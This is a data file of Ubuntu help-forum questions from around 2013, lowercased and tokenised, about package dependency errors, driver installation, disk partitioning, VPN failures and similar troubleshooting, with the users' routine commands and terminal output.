335654	any sites of guides or blogs of people installing linux on low-end or low resource pcs or compute devices	im looking for a website where a community of people that successfully and stably install linux distros on low-end and low resource pcs or compute devices ( raspberry pi for example ) . ubuntu preferred or linux os that can use ubuntu apps . basicly i need an os to install on my mom 's laptop that came out with windows xp and one of my desktops that also came with xp . laptop : lenovo thinkpad r61i , pentium dual core , 1gb ddr2 ram , intel family gpu . 12.04 is slow as crap on it ( default settings ) . desktop : custom , pentium 4 775 socket , 512mb ddr ram , nvidia 8800gts discrete card . havent been on it in a while . thanks alex ps : im talking about linux distros of today . not a 5 year old version or something .
335655	/boot full caused kernel dependency problems ubuntu 12.04	i let the auto security update fill /boot . i deleted some files , but apparently there were other issues . this is a similar problem that i have seen in this forum over and over but i have tried all the solutions i have seen and nothing seems to work . root @ mail : ~ # apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-generic-pae : depends : linux-headers-generic-pae ( = 3.2.0.51.61 ) but 3.2.0.52.62 is installed linux-image-generic-pae : depends : linux-image-3.2.0-51-generic-pae but it is not installed e : unmet dependencies . try using -f. so i try then next logical step and i get the following . root @ mail : ~ # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-3.2.0-38-generic-pae linux-headers-3.2.0-41-generic-pae linux-headers-3.2.0-40 linux-headers-3.2.0-41 linux-headers-3.2.0-38 linux-headers-3.2.0-44 linux-headers-3.2.0-39 linux-headers-3.2.0-45 linux-headers-3.2.0-48 linux-headers-3.2.0-44-generic-pae linux-headers-3.2.0-39-generic-pae linux-headers-3.2.0-48-generic-pae linux-headers-3.2.0-45-generic-pae linux-headers-3.2.0-40-generic-pae use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-generic-pae linux-image-generic-pae the following packages will be upgraded : linux-generic-pae linux-image-generic-pae 2 upgraded , 0 newly installed , 0 to remove and 49 not upgraded . 2 not fully installed or removed . need to get 0 b/4,074 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of linux-image-generic-pae : linux-image-generic-pae depends on linux-image-3.2.0-51-generic-pae ; however : package linux-image-3.2.0-51-generic-pae is not installed . dpkg : error processing linux-image-generic-pae ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic-pae : no apport report written because the error message indicates its a followup error from a previous failure . linux-generic-pae depends on linux-image-generic-pae ( = 3.2.0.51.61 ) ; however : package linux-image-generic-pae is not configured yet . linux-generic-pae depends on linux-headers-generic-pae ( = 3.2.0.51.61 ) ; however : version of linux-headers-generic-pae on system is 3.2.0.52.62. dpkg : error processing linux-generic-pae ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-image-generic-pae linux-generic-pae e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 've tried purge , clean , reinstall , etc , etc . any suggestions ? thanks .
335667	receiving drag events in a webview in a qml application	i 'm working on an app using qml and the ubuntu sdk . one of the pages contains a webview . while the webview receives click events just fine , it does n't receive drag events , as i would like it to . i assume the problem is that drag events are being trapped to provide navigation gestures for the webview . this is n't necessary : the webview is sized to exactly fill up the available space . in the html displayed by the webview , i set < meta name= '' viewport '' content= '' initial-scale=1.0 , user-scalable=no '' > , to keep the webview from allowing zooming . the content is sized to fill up the viewport , so there 's no need for scrolling . but still , no drag events come through to the webview . what do i need to do to let them through ? edit to add : i 've gotten reports that touch-and-drag works just fine ; it 's only mouse drag events that do n't work . that would be consistent with this post , which suggests that mouse handling in webviews in qml is broken .
335669	resizing partions with gparted	so here 's the situation : after installing ubuntu 12.04 lts , running df -h gives me the following partitions : /dev/loop0 , 29g , 9.3g , 19g , 33 % , / udev , 1.9g , 4.0k , 1.9g , 1 % , /dev tmpfs , 771m , 892k , 770m , 1 % , /run none , 5.0m , 0 , 5.0m , 0 % , /run/lock none , 1.9g , 15m , 1.9g , 1 % , /run/shm /dev/sda2 , 466g , 54g , 412g , 12 % , /host would it be possible to use gparted to resize my 466gb windows 7 partition into a 300gb windows 7 partition and a 166gb partition for media that ubuntu can graft on as a sub-tree , leaving my ubuntu system partition the same size and without having to reinstall windows , i.e . grab 166gb worth of free space from the windows partition and add it to ubuntu ? ( the issue is that i bought my laptop used , so i do n't have the install cd . ) if so , does gparted automatically graft the partition on , or will i have to mount it ? and what of the file system journalling ? will i have to manually configure that ? any advice would be greatly appreciated ! of course , i 'll back everything up beforehand just in case . thanks . apologies in advance if this question has been answered or is a duplicate ; my knowledge of *nix file systems is at an all time low ...
335672	deleted files and folders to boot to ubuntu - any way to retrieve files ?	i was cleaning up my e : drive , on which i downloaded ubuntu ( using wubi ) , and i accidentally deleted the ubuntu folder , and i also deleted some other files on my e : drive that i did n't recognize . the result of my action is that selecting to boot to ubuntu results in the following message : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . 2 . choose your language settings , and the click `` next '' . 3 . click `` repair your computer . '' if you do not have this disc , contact your system administrator or computer manufacturer for assistance . file : \ubuntu\winboot\wubildr.mbr status : 0xc0000098 info : the selected entry could not be loaded because the application is missing or corrupt . i read somewhere that the wubildr.mbr file may have been on the e : drive as well , rather than in the ubuntu folder , as the above message suggests . i deleted every file that i did n't recognize that was n't in a folder on my e : drive . so it 's definitely gone , regardless . i also emptied the recycle bin . so , here 's the thing . i have some files that i saved to the ubuntu desktop . and i very much need them back . is there any way i can get them back ? i am really hoping that it might be as simple as `` click here to download the folder and files you foolishly deleted and simply place them on your e : drive '' . i understand that that is unlikely . any ideas ? suggestions ? or is it simply a loss that i 'm going to have to accept ?
335678	how does usermod determine that a user is logged in ?	i simply wanted to change the location of the home directory , so i followed these instructions : usermod -d /path_to_new_dir a_user however , ubuntu 12.04 responds : usermod : user a_user is currently logged in so i checked sudo w , sudo who , and sudo lsof -u a_user , but see nothing from a_user . nonetheless , i still try to kill the user : sudo skill -kill -u a_user and sudo pkill -u a_user , but no luck . ubuntu still responds : usermod : user a_user is currently logged in . any ideas on what to try next ?
335679	gedit not displaying certain tabs	i am using gedit to edit a ruby file . in gedit ( and sublime ) certain tabs are not displayed , that are displayed when i paste into the internet , open with vi or open with geany . this is all summarized in the following photo which you can zoom in to see the details ( look at the lines that start with a # : is this a setting problem or an actual bug that i should report ? this would be a minor problem except unexpected tabs break my documentation generator , which breaks more things that are important to me .
335681	new to ubuntu , no loggin or password !	i downloaded ubuntu 13.4 and i can only sign in as guest . i entered the user and password i originally chose and nothing works . i ca n't do anything because i do n't know the root password either . i run ubuntu as well as windows 7 home premium on my compaq . i 'm brand new to ubuntu and not too smart when it comes to coding . please help if you can . and i 'm not able to access the internet due to the fact i do n't have the root password !
335684	installation difference between from source and apt-get ?	what 's the difference between installation from source ( ./configure & & make & & make install ) and with apt-get ? i can think of these : apt-get version usually is more stable and less choice , while we can chose the specific version when install from source . apt-get can resolve dependencies automatically , can update/uninstall software easily , and has some other easy management goodness . apt-get installation path follows a consistent pattern , and have some other conventions , which is convenient for sa . but are there more ? can installation from source get better performance than via apt-get for some certain software , like php and mysql ? some other differences ? in a word , in which condition should i chose installation from source than apt-get , except to get a specific version of that software ? thanks .
335685	hibernate ubuntu 13.04 lenovo x1	i understand that the lenovo thinkpad x1 ultrabook supports hibernation , however i can not work out how to get it working . i have already created a swap partition . i tried to run sudo pm-hibernate , but it has no effect . edit ... ... ... ... ... ... ... upower -d | grep can-hibernate output can-hibernate : no for free-m output total used free shared buffers cached mem : 7687 3399 4287 0 88 1936 -/+ buffers/cache : 1375 6312 swap : 7887 0 7887
335687	python-uno : depends : libreoffice-core ( = 1:4.0.2-0ubuntu1 )	i have install libreoffice4.1 but when i try to install python-uno it had error sudo apt-get install python-uno reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : python-uno : depends : libreoffice-core ( = 1:4.0.2-0ubuntu1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i do n't know how to fix this . please help . apt-cache policy python-uno libreoffice-core python-uno : installed : ( none ) candidate : 1:4.0.2-0ubuntu1 version table : 1:4.0.2-0ubuntu1 0 500 http : //mirror.cc.columbia.edu/pub/linux/ubuntu/archive/ raring/universe amd64 packages libreoffice-core : installed : ( none ) candidate : 1:4.0.2-0ubuntu1 version table : 1:4.1.0-0ubuntu1~raring1~ppa1 0 100 /var/lib/dpkg/status 1:4.0.2-0ubuntu1 0 500 http : //mirror.cc.columbia.edu/pub/linux/ubuntu/archive/ raring/main amd64 packages after add ppa for libreoffice i install but have error like this reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libreoffice-common libreoffice-core suggested packages : libreoffice-style-crystal libreoffice-style-hicontrast libreoffice-style-human libreoffice-style-oxygen libreoffice-style-tango the following new packages will be installed : libreoffice-common libreoffice-core python-uno 0 upgraded , 3 newly installed , 0 to remove and 0 not upgraded . need to get 28.5 mb/56.2 mb of archives . after this operation , 196 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //ppa.launchpad.net/libreoffice/ppa/ubuntu/ raring/main libreoffice-core amd64 1:4.1.0-0ubuntu1~raring1~ppa1 [ 28.2 mb ] get:2 http : //ppa.launchpad.net/libreoffice/ppa/ubuntu/ raring/main python-uno amd64 1:4.1.0-0ubuntu1~raring1~ppa1 [ 284 kb ] fetched 28.5 mb in 1min 21s ( 351 kb/s ) ( reading database ... 415424 files and directories currently installed . ) unpacking libreoffice-common ( from ... /libreoffice-common_1 % 3a4.1.0-0ubuntu1~raring1~ppa1_all.deb ) ... dpkg : error processing /var/cache/apt/archives/libreoffice-common_1 % 3a4.1.0-0ubuntu1~raring1~ppa1_all.deb ( -- unpack ) : trying to overwrite '/usr/bin/soffice ' , which is also in package openoffice-debian-menus 4.0-9702 rmdir : failed to remove ‘/var/lib/libreoffice/share/prereg/’ : no such file or directory rmdir : failed to remove ‘/var/lib/libreoffice/share/’ : directory not empty rmdir : failed to remove ‘/var/lib/libreoffice/program/’ : no such file or directory rmdir : failed to remove ‘/var/lib/libreoffice’ : directory not empty rmdir : failed to remove ‘/var/lib/libreoffice’ : directory not empty selecting previously unselected package libreoffice-core . unpacking libreoffice-core ( from ... /libreoffice-core_1 % 3a4.1.0-0ubuntu1~raring1~ppa1_amd64.deb ) ... selecting previously unselected package python-uno . unpacking python-uno ( from ... /python-uno_1 % 3a4.1.0-0ubuntu1~raring1~ppa1_amd64.deb ) ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for shared-mime-info ... unknown media type in type 'all/all' unknown media type in type 'all/allfiles' unknown media type in type 'uri/mms' unknown media type in type 'uri/mmst' unknown media type in type 'uri/mmsu' unknown media type in type 'uri/pnm' unknown media type in type 'uri/rtspt' unknown media type in type 'uri/rtspu' processing triggers for man-db ... processing triggers for gnome-icon-theme ... processing triggers for hicolor-icon-theme ... errors were encountered while processing : /var/cache/apt/archives/libreoffice-common_1 % 3a4.1.0-0ubuntu1~raring1~ppa1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) if i run sudo dpkg -- configure -a dpkg : dependency problems prevent configuration of libreoffice-core : libreoffice-core depends on libreoffice-common ( > > 1:4.1.0 ) ; however : package libreoffice-common is not installed . dpkg : error processing libreoffice-core ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python-uno : python-uno depends on libreoffice-core ( = 1:4.1.0-0ubuntu1~raring1~ppa1 ) ; however : package libreoffice-core is not configured yet . dpkg : error processing python-uno ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libreoffice-core python-uno if i run sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libreoffice-common suggested packages : libreoffice-style-crystal libreoffice-style-hicontrast libreoffice-style-human libreoffice-style-oxygen libreoffice-style-tango the following new packages will be installed : libreoffice-common 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . need to get 0 b/27.7 mb of archives . after this operation , 76.9 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 415610 files and directories currently installed . ) unpacking libreoffice-common ( from ... /libreoffice-common_1 % 3a4.1.0-0ubuntu1~raring1~ppa1_all.deb ) ... dpkg : error processing /var/cache/apt/archives/libreoffice-common_1 % 3a4.1.0-0ubuntu1~raring1~ppa1_all.deb ( -- unpack ) : trying to overwrite '/usr/bin/soffice ' , which is also in package openoffice-debian-menus 4.0-9702 rmdir : failed to remove ‘/var/lib/libreoffice/share/prereg/’ : no such file or directory rmdir : failed to remove ‘/var/lib/libreoffice/share/’ : directory not empty rmdir : failed to remove ‘/var/lib/libreoffice/program/’ : no such file or directory rmdir : failed to remove ‘/var/lib/libreoffice’ : directory not empty rmdir : failed to remove ‘/var/lib/libreoffice’ : directory not empty processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for shared-mime-info ... unknown media type in type 'all/all' unknown media type in type 'all/allfiles' unknown media type in type 'uri/mms' unknown media type in type 'uri/mmst' unknown media type in type 'uri/mmsu' unknown media type in type 'uri/pnm' unknown media type in type 'uri/rtspt' unknown media type in type 'uri/rtspu' processing triggers for man-db ... processing triggers for gnome-icon-theme ... processing triggers for hicolor-icon-theme ... errors were encountered while processing : /var/cache/apt/archives/libreoffice-common_1 % 3a4.1.0-0ubuntu1~raring1~ppa1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
335688	how do i get ubuntu 13.04 installed in hp pavilion dv4 series entertainment notebook pc	i have hp pavilion dv4-1204tu notebook entertainment pc . i have installed ubuntu 13.04 how do i get all the devices running inside notebook to function on ubuntu 13.04 ? ( devices like some shortcut buttons etc . ) there is a panel of shortcut buttons like volume buttons/media buttons .
335689	does ubuntu have support for sony vaio pro series	i have installed ubuntu 12.10 on a sony vaio pro 13 . the keyboard layout ( us_en ) is completely wrong . if i press `` i '' for example , `` 5 '' appears . wi-fi on the other hand is also broken as it 's not detecting on-board wlan network adapter .
335690	installation of ubuntu 12.04 alongside windows 8 on sony vaio svf15218sn	i have installed ubuntu 12.04 alongside windows 8 on my sony vaio svf15218sn laptop , but i am unable to boot ubuntu . i disabled the secure boot option . please suggest some solutions .
335691	clipboard operation between libreoffice and other application	when i want to copy text from libreoffice to an gmail in the chrome browser , the clipboard does not work unless i keep the text document of libreoffice open . how can i fix this limitation or is it just a matter of waiting for improvements ?
335694	vpnc has stopped working with cisco vpn gateway ubuntu 13.04	recently i 've been unable to connect to a cisco vpn gateway using vpnc even though i had been using vpnc to connect to this same gateway for about a year leading up to this breakage ... i 'm using the command line client , not networkmanager . strangely , sometimes if i reboot and try again it works ... however , tonight i tried that a few times and never got through ... i see the following messages in /var/log/syslog : aug 21 22:44:56 sonbuntu networkmanager [ 1193 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/tun0 , iface : tun0 ) aug 21 22:44:56 sonbuntu networkmanager [ 1193 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/tun0 , iface : tun0 ) : no ifupdown configuration found . aug 21 22:44:56 sonbuntu networkmanager [ 1193 ] : < warn > /sys/devices/virtual/net/tun0 : could n't determine device driver ; ignoring ... aug 21 22:47:06 sonbuntu avahi-daemon [ 1116 ] : withdrawing workstation service for tun0 . aug 21 22:47:06 sonbuntu networkmanager [ 1193 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/tun0 , iface : tun0 ) aug 21 22:48:08 sonbuntu networkmanager [ 1193 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/tun0 , iface : tun0 ) aug 21 22:48:08 sonbuntu networkmanager [ 1193 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/tun0 , iface : tun0 ) : no ifupdown configuration found . aug 21 22:48:08 sonbuntu networkmanager [ 1193 ] : < warn > /sys/devices/virtual/net/tun0 : could n't determine device driver ; ignoring ... when i strace it , it seems to hang around here : time ( null ) = 1377150323 times ( { tms_utime=8 , tms_stime=1 , tms_cutime=0 , tms_cstime=0 } ) = 1717972828 gettimeofday ( { 1377150323 , 725505 } , null ) = 0 getrusage ( rusage_self , { ru_utime= { 0 , 88000 } , ru_stime= { 0 , 16000 } , ... } ) = 0 time ( null ) = 1377150323 times ( { tms_utime=8 , tms_stime=1 , tms_cutime=0 , tms_cstime=0 } ) = 1717972828 time ( null ) = 1377150323 poll ( [ { fd=3 , events=pollin } ] , 1 , 96000 ) = 0 ( timeout ) poll ( [ { fd=3 , events=pollin } ] , 1 , 192000^c < unfinished ... > my version of vpnc has n't changed since i originally installed it : version : 0.5.3r512-2ubuntu1 however , i did notice that one of its dependencies , libgcrypt11 , did recently change : version : 1.5.0-3ubuntu2.2 ( used to be 1.5.0-3ubuntu1 ) . as i see it there could be a few different possibilities about why this has broken : libgcrypt11 broke it some ubuntu kernel configuration broke it ( /var/log/syslog is complaining about a lacking driver ... ) something changed on the gateway 's end ( i plan on asking it if they 've changed anything but it will be very hard to actually get connected to the right person for this ) should i try to roll back libgcrypt11 ? any other ideas ? why is /var/log/syslog complaining about a missing driver ? i 've tried some of the responses to this similar-looking vpnc problem but to no avail ... update it appears to be a bug in libgcrypt11=1.5.0-3ubuntu2.2 . see my answer for details .
335695	why does /etc/issue show me ubuntu and not lubuntu ?	cat /etc/issue shows me ubuntu 13.04 \n \l but i 'm on lubuntu 13.04 . what is the purpose of /etc/issue ? also , what does \n \l in the output mean ? there 's also issue.net which has just ubuntu 13.04 . ( i know that echo $ desktop_session gives me lubuntu . )
335698	tata photon 3g zte mf190 detected in ubuntu 13.04 but not connected	i 'm using ubuntu 13.04 . earlier i used huawei 2g internet dongle which worked fine . recently i got tata photon 3g dongle which in zte mf190 model , it gets recognized and appears in my network panel on the top right corner but does not get connect . i already tried configuration through mobile broadband methoed . i 'm unable to install wvdial offline . i appreciate any resolution or suggestion towards the same ! ! !
335706	run java programs residing on server	i am using ubuntu 12.04 . i have uploaded a small java program ( hadoop word count ) to a linux-server using filezilla and now have to run that program onto server machine . i know how to connect to server using terminal i.e . ssh -l user-name ip-of-server but do n't know how to run program that resides there . please help me how to run that program from my machine .
335708	ctrl+alt+f1 shows on wrong display	i have dual displays : a monitor and a projector . whenever i want to go to ctrl+alt+f1 , the tty is displayed not on my monitor , but instead it is displayed through the projector on the wall . the monitor goes in power saving mode . if the projector is turned off , there is no way i can see anything when i press ctrl+alt+f1 . i tried to switch the cables , but when i do that , the monitor is showing wrong resolution and i ca n't set the normal one . i just ca n't look at the screen that way , it hurts my eyes etc . ( this is probably because of the dvi to vga adapter i 'm using ) . but when the cables are switched , the tty does show on my monitor . but that does n't solve my problem . i want to see the ctrl+alt+f1 screen and get normal resolution both in my monitor and in my projector . i 'm using unity on ubuntu 12.04 .
335709	ubuntu 13.04 - ca n't see external ntfs drive	i have upgraded from ubuntu 12.10 to 13.04 ( x64 ) and from kde v4.10 to v4.11 . same kernel 3.8 . since the upgrade i have an issue with my verbatim store'n go 500gb usb external drive recognition , it takes a lot of time before recognize my external drive . i 'll give you some more informations : it just happens with my external drive and it does not with my usb pen drives it happens on ubuntu but it works well on windows 7 ( windows 7 immediately recognizes the external drive as it does with other devices ) so it 's not related to my external drive it 's not related to my usb port because it 's the same i use to connect the same external drive on windows 7 it does n't happen with other external drives ( so it 's very strange now ) the same external drive was immediately recognized with ubuntu 12.10 it 's not related to the desktop environment because i have the same issue with unity sometimes the drive is seen with 'sudo fdisk -l ' but it 's not recognized from the file manager ( same thing with unity and kde ) how can i solve it ? edit : here is /etc/fstab : http : //pastebin.com/raw.php ? i=qpawt31b and this it /proc/mounts : http : //pastebin.com/raw.php ? i=ub4f1xuw thanks
335712	ubuntu å vs osx å ?	not sure if this is a ubuntu or osx question , but i 'll start here . i 'll leave it to the mods to move the question to askdifferent if more apropriate . i moved a file from ubuntu to osx using scp on the apple machine . i edited the file on the apple machine . then i moved the file back , again using scp on the apple machine . the filename of the source file was documents/trettiårsfirarätare . sourcecode : documents/trettiårsfirarätare the filename i got back had the name documents/trettiårsfirarätare . sourcecode : documents/trettia˚rsfirara¨tare while these might look similar , the letters å and ä is actually different between them . at no point did i change the name of the file . this makes little technical difference to me , i just changed the name of the file back to what ubuntu considers å and ä , but it tickled my curiosity . can you explain to me why this happened ?
335720	agent-state-info : 'hook failed : `` config-changed '' deploy wordpress using juju	i have one virtual machine on windows azure . i have installed juju inside my virtual machine . i want to deploy wordpress on my vm . i 'm run on 64 bit machine i 've read this blog about step by step how to deploy wordpress : https : //juju.ubuntu.com/get-started/local but i got error on my juju status like bellow : machines : `` 0 '' : agent-state : started agent-version : 1.12.0.1 dns-name : 10.0.3.1 instance-id : localhost series : precise `` 1 '' : agent-state : started agent-version : 1.12.0.1 instance-id : azureuser-local-machine-1 instance-state : missing series : precise `` 2 '' : agent-state : started agent-version : 1.12.0.1 instance-id : azureuser-local-machine-2 instance-state : missing series : precise services : mysql : charm : cs : precise/mysql-27 exposed : false relations : cluster : - mysql db : - wordpress units : mysql/0 : agent-state : error agent-state-info : 'hook failed : `` config-changed '' ' agent-version : 1.12.0.1 machine : `` 1 '' public-address : 10.0.3.209 wordpress : charm : cs : precise/wordpress-16 exposed : true relations : db : - mysql loadbalancer : - wordpress units : wordpress/0 : agent-state : started agent-version : 1.12.0.1 machine : `` 2 '' public-address : 10.0.3.174 then when i try to access public address which have ip 10.0.3.174 i got bad gateway . on juju status i founded : units : mysql/0 : agent-state : error agent-state-info : 'hook failed : `` config-changed '' ' how to solve this error ?
335722	my computer refuses to use my nvidia driver	i find this sort of issue everywhere , however i have been at this for just about two weeks and really need to fix this , as i need the functionality of my nvidia geforce gt 540m . running an external monitor via hdmi ( 1920x1080 ) and using my laptop screen ( 1366x768 ) as my secondary screen . my process : download the driver from nvidia 's site ; linux x64 for gt540m . ( version 319.49 ) renamed to nvidia.run ctrl+alt+f1 sudo bash sudo service lightdm stop & & sudo service gdm stop sh /home/jake/downloads/nvidia.run - > installer launches accepted the license install nvidia 's 32-bit compatibility opengl libraries ? yes run nvidia-xconfig utility ? yes ( supposed to create a file most likely about my monitors ie . 10.monitor.xml and/or xorg.conf ) - > installer complete reboot my issue : could not apply stored configuration for monitors none of the selected modes were compatible with the possible modes : trying modes for crtc 63 crtc 63 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 63 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) trying modes for crtc 64 crtc 64 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 0 ) crtc 64 : trying mode 640x480 @ 60hz with output at 1366x768 @ 60hz ( pass 1 ) the screens are very small , but i manage to uncheck the `` mirror displays '' and set my external monitor to 1920x1080 . however , my laptop screen is stuck at 640x480 , with no other options available next to forcing it via command line from terminal . ( a band-aid for a festering wound only covers it up ) i start up an application that requires java and/or opengl , minecraft , of course , and it gives me org.lwjgl.lwjglexception : could not init glx any ideas ? thanks . update i purged my old nvidia driver , ran sudo apt-get nvidia-319 . restarted . resolution is back to it 's intended and desired settings ! however : i start up nvidia xserver settings , and it gives me : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just runnvidia-xconfigas root ) , and restart the x server . i ran sudo nvidia-xconfig , rebooted , and my resolution issue returned ( back to 640x480 on both screens ) . here is the xorg.conf : nvidia-xconfig : x configuration file generated by nvidia-xconfig nvidia-xconfig : version 325.15 ( buildmeister @ swio-display-x64-rhel04-03 ) wed jul 31 19:04:27 pdt 2013 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' update # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection
335724	loading icc profiles on ubuntu for pandaboard [ arm ]	i have a pandaboard on which ubuntu 12.04 is installed . i am having difficulty loading an .icc profile onto the system to calibrate my monitor . i tried gnome 's color settings and xcalib software but they do n't have an effect when i load an .icc profile even though they do n't show any errors . on my laptop with ubuntu 12.04 i have no problem loading the same .icc profile it immediately takes effect . i tried installing the restricted powervr driver on it but it had no effect . what might be the problem ? might there be a driver problem ? or does pandaboard hardware not support .icc profiles ?
335725	multi-monitor setup , only terminal on one monitor	i currently have three monitors hooked up to my computer . i was just wondering if it is possible to have two monitors use the window manager - so , gui - and have a single monitor not using the gui but only command-line ?
335729	how to modify the apache cordova code ubuntu sdk to avoid errors ?	any project cordova ubuntu html5 touch ui created using qt creator 2.7.1 in ubuntu 13.04 produces the following error warning : file : ///usr/lib/x86_64-linux-gnu/qt5/qml/cordovaubuntu.2.8/cordovaviewinternal.qml:74:38 : can not assign to non-existent property `` universalaccessfromfileurlsallowed '' . is there any way to correct it by editing the code ?
335733	empty jockey install proprietory nvidia after bumblebee on 13.04	i am trying to install the proprietory nvidia drivers on my asus ux32vd ( gt620m ) running 13.04 . since the additional drivers ( jockey ) tab was empty i followed the advice from a similar question here to install bumblebee . unfortunately the jockey tab is still empty ( as in , my card does not show up ) . my question is twofold how do i get the nvidia drivers to show up in the additional drivers tab ? after having installed bumblebee , which is the way to install nvidia drivers ? ( as the bumblebee site mentions something on specific packages ) upon request : 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : asustek computer inc. device 1507 flags : bus master , fast devsel , latency 0 , irq 47 memory at f7400000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at f000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 00:04.0 signal processing controller : intel corporation 3rd gen core processor thermal subsystem ( rev 09 ) subsystem : asustek computer inc. device 1507 flags : bus master , fast devsel , latency 0 , irq 11 memory at cfe08000 ( 64-bit , non-prefetchable ) [ size=32k ] capabilities : < access denied > 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) ( prog-if 30 [ xhci ] ) subsystem : asustek computer inc. device 1507 flags : bus master , medium devsel , latency 0 , irq 43 memory at f7900000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied >
335734	how to completely uninstall ubuntu	i am going to install ubuntu on my laptop/desktop , but i am already using another os on my computer . after that how can i remove ubuntu permanently from my computer and still keep my old operating system and data ?
335739	usb memory stick not working any more	i have one usb memory stick ( fat32 ) that i was using on ubuntu . however , recently it does not mount when i put it into the usb port . application `` disks '' does not recognize it at all . however , when i start windows , i can access my data and use this stick normally . stick is 8 gb of size . when was under windows , i preformed disk checkup , and everything is fine with the stick . but sticks does not work any more on ubuntu . other sticks are still working normally on ubuntu ( i have one with 4 gb , and another of 2 gb ) . output of sudo fdisk -l : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x943c943c device boot start end blocks id system /dev/sda1 * 63 312560639 156280288+ 7 hpfs/ntfs/exfat /dev/sda2 312561662 625141759 156290049 5 extended /dev/sda5 617332736 625141759 3904512 82 linux swap / solaris /dev/sda6 312561664 617332735 152385536 83 linux partition table entries are not in disk order after some period of time ( about 5 minutes of waiting ) sudo fisk -l provided additional lines : disk /dev/sdb : 8074 mb , 8074035200 bytes 39 heads , 31 sectors/track , 13043 cylinders , total 15769600 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x04030201 device boot start end blocks id system /dev/sdb1 2056 15769599 7883772 b w95 fat32 in order to open it again , i need to type this command and wait ...
335740	why are n't my changes to /etc/security/limits.conf having effect ?	i am trying to provide support for core dumps on my ubuntu machine ( as by default they are disabled ) . so i have made the following changes to /etc/security/limits.conf : root hard core 1000 after adding this line to /etc/security/limits.conf , i was expecting the generation of core files but ulimit -a shows me : core file size ( blocks , -c ) 0 why are n't the changes in /etc/security/limits.conf reflected in ulimit ? what should i do to have them taken into account ?
335741	i have problem with gnome3	i have a problem with this code in terminal : sudo apt-get install gnome-shell it 's not working look at this error e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? what should i do to install gnome3 ? thank you for that link . i typed this code in terminal : sudo rm /var/lib/apt/lists/lock and this : sudo rm /var/cache/apt/archives/lock and my previous problem has solved . but when i type this in terminal again : sudo apt-get install gnome-shell it 's does n't work again ! look at this error : reading package lists ... done building dependency tree reading state information ... done gnome-shell is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 219 not upgraded . how can i use gnome3 interface ?
